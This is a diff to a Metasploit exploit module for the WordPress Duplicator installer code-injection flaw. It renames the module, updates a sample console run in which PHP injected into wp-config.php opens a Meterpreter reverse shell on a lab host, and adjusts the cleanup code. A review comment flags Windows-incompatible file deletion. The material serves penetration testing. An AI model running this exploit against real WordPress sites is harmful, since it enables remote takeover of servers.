diff --git a/documentation/modules/exploit/multi/php/wordpress_duplicator.md b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md
similarity index 64%
rename from documentation/modules/exploit/multi/php/wordpress_duplicator.md
rename to documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md
index f471c39e79..177da9c9f2 100644
--- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md
+++ b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md
@@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
 Confirm that functionality works:
 1. Start `msfconsole`
-2. `use exploit/multi/php/wordpress_duplicator`
+2. `use exploit/multi/php/wp_duplicator_code_inject`
 3. Set the `RHOST`.
 4. Confirm the target is vulnerable: `check`
 5. Confirm that the target is vulnerable: `The target is vulnerable.`
@@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
 ### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
 ```
-msf5 > use exploit/multi/php/wordpress_duplicator
-msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
-RHOSTS => 192.168.56.101
-msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
-LHOST => 192.168.56.1
-msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
-TARGETURI => /installer_vuln.php
-msf5 exploit(multi/php/wordpress_duplicator) > run
+msf5 > use exploit/multi/php/wp_duplicator_code_inject
+msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
+rhosts => 192.168.37.247
+msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
+targeturi => /wordpress/installer.php
+msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf5 exploit(multi/php/wp_duplicator_code_inject) > run
-[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Started reverse TCP handler on 192.168.37.1:4444
 [*] Checking if the wp-config.php file already exists...
-[*] This WordPress was not restored. Creating the wp-config.php file...
-[*] Successfully created the wp-config.php file!
 [*] All good! Injecting PHP code in the wp-config.php file...
 [*] Requesting wp-config.php to execute the payload...
-[*] Sending stage (37775 bytes) to 1.1.1.1
+[*] Sending stage (38247 bytes) to 192.168.37.247
+[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
+[*] Attempting to recreate wp-config file...
+[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
+[*] Successfully created the wp-config.php file!
-meterpreter > sysinfo
-Computer : debian
-OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
-Meterpreter : php/linux
+meterpreter > sysinfo
+Computer : WIN-0FAJA14JLP4
+OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
+Meterpreter : php/windows
+meterpreter >
 ```
diff --git a/modules/exploits/multi/php/wordpress_duplicator.rb b/modules/exploits/multi/php/wp_duplicator_code_inject.rb
similarity index 95%
rename from modules/exploits/multi/php/wordpress_duplicator.rb
rename to modules/exploits/multi/php/wp_duplicator_code_inject.rb
index 0bfdd4dbeb..a7d8fb5414 100644
--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wp_duplicator_code_inject.rb
@@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def on_new_session(client)
- if client.type.eql? 'meterpreter'
- client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
- client.fs.file.rm 'wp-config.php'
+ if client.type.eql?('meterpreter')
+ client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
+ client.fs.file.rm('wp-config.php')
 else
- client.shell_command_token 'rm wp-config.php'
+ client.shell_command_token('rm wp-config.php')
 end
+ print_status("Attempting to recreate wp-config file...")
 create_wp_config_file
 end
 end
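Review bot: The shell branch of `on_new_session` runs `client.shell_command_token('rm wp-config.php')`, which assumes a POSIX shell even though the module sits under `multi/php` and the updated sample run in the documentation is against a Windows host, where `rm` is not a cmd.exe built-in. If the delete fails, the `wp-config.php` carrying the injected PHP stays on the tested server, and `create_wp_config_file` (defined outside this hunk) still runs after a status line that reports nothing about the failure. Choose the command per platform (`del wp-config.php` on Windows) and report failure with something like `print_warning('Could not remove wp-config.php, remove it manually')`. The path is also relative, so both branches presumably depend on the session's working directory being the WordPress root; worth confirming.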